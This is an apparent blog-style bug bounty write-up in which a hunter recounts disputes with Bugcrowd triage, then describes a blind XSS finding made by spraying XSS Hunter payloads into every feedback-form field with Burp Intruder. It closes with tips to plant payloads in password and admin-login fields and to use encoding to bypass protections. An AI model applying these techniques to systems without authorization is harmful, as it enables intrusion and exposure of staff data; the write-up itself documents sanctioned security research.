BOOK THIS SPACE FOR AD
ARTICLE ADHello amazing hackers, My name is Deepak Dhiman ( also known as @Virdoex_hunter in bug bounty community ). I am a bug bounty hunter I hunt when I want to (looking for job,intern). Today I’ll share my first bounty experience on bugcrowd(after clickbaiting and no support and no invite). Hope you will enjoy and learn something .
When I start hacking on bugcrowd I came to know its a nice platform for beginners (so that time I only knew few bugs and less experience) so my first 4 reports were duplicates and I got 4 points I feel cool but after some time they make my every report was N/A and after some time I give some negative points on feedback in researcher experience and I will stop receiving any private invite.
Since I am not receiving any private and I have only 14 points so I look for finding private program using dorks so I talk to Aditya Shende bro which dork list I have to use to find programs and he recommend me a github repo which help me to find program and hunt.
So finally I am sending reports on bugcrowd and now this year in March 21 I submit a email htmli bug on a private (joinable) program first 14 days they changed 4 triagers and every one ask me the poc again and again and after 2 month of triage they make it duplicate of a xss(since you can not login so it never be possible) means false one and than I ask invite me on that report(I know on bugcrowd its not) but I wanna see is this really a duplicate but they don’t gave me any response.So I leave it and than I report my favorite bug DOS on 3 different program and they make it duplicate by changing priority P3 to P2 and finally I found the same dos on a program where it is valid and at that time they make it P5 I mail their support team but no response still now from last 3 months (if its not clickbaiting than let me know what it is). So I tweet to support team but they give response that they will ban me instead of giving me fair result.
So one day I am hunting on an rdp and their is feedback form on products so I go to xsshunter.com/app and copy my all payloads. And I put test on every field(except email) in name,message etc and intercept the request in burp and send it to intruder and choose test as position (every test) and use pitch fork attack in payload I choose simple list and paste my all xsshunter payload and click on start attack . After 5 hours I got email notification that my payload triaged and in first week it triaged 30 times and I got 3 employees ip who is logged in that 3rd party application to handle forms . I report it and next day they invite me on bugcrowd and reward me with $$$
don’t give negative feedback on platformfor blind xss put your payload on every kind of input field (even in the password ,wrong attempts on admin panel because some time it save logs of creds tried for admin and may possible your blind xss payload work here).you can also use intruder for encoding for bypass protectionI hope you like this writeup.
Thank you for giving your time on this.